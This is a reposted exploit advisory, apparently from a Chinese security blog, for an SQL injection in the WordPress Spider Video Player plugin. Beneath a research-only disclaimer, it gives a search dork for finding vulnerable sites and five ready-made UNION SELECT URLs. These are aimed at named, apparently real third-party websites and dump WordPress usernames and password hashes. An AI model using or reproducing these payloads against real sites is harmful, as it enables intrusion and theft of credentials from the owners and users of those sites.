Wordpress Spider Video Player plugin SQL Injection

测试方法:

程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. # Exploit Title : Wordpress Spider Video Player plugin SQL Injection
    2. #
    3. # Exploit Author : Ashiyane Digital Security Team
    4. #
    5. # Plugin Link : http://web-dorado.com/
    6. #
    7. # Home : www.ashiyane.org
    8. #
    9. # Security Risk : High
    10. #
    11. # Version : 2.1
    12. #
    13. # Dork : inurl:wp-content/plugins/player/settings.php?playlist=
    14. #
    15. # Tested on: Linux
    16. #
    17. ##############
    18. #Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
    19. #
    20. #
    21. #DEm0:
    22. # http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
    23. #
    24. # http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
    25. #
    26. # http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
    27. #
    28. # http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
    29. #
    30. # http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
    31. #
    32. ##############
    33. #Greetz to: My Lord ALLAH
    34. ##############
    35. #
    36. # Amirh03in
    37. #
    38. ##############
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/security4399/p/3015576.html